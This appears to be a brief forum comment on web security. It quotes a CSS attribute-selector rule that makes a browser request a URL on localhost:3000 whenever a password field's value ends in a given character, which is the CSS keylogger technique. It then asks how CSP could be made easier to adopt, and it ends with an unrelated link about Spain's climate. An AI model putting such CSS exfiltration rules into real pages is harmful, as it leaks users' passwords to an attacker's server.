input[type="password"][value$=" "] { background-image: url("http://localhost:3000/+"); }
How can we improve the web to make stuff like this more secure? Just setting up CSP (which can prevent the CSS issue) can be trial & error pain that is hard to test.
[1] https://www.climatestotravel.com/climate/spain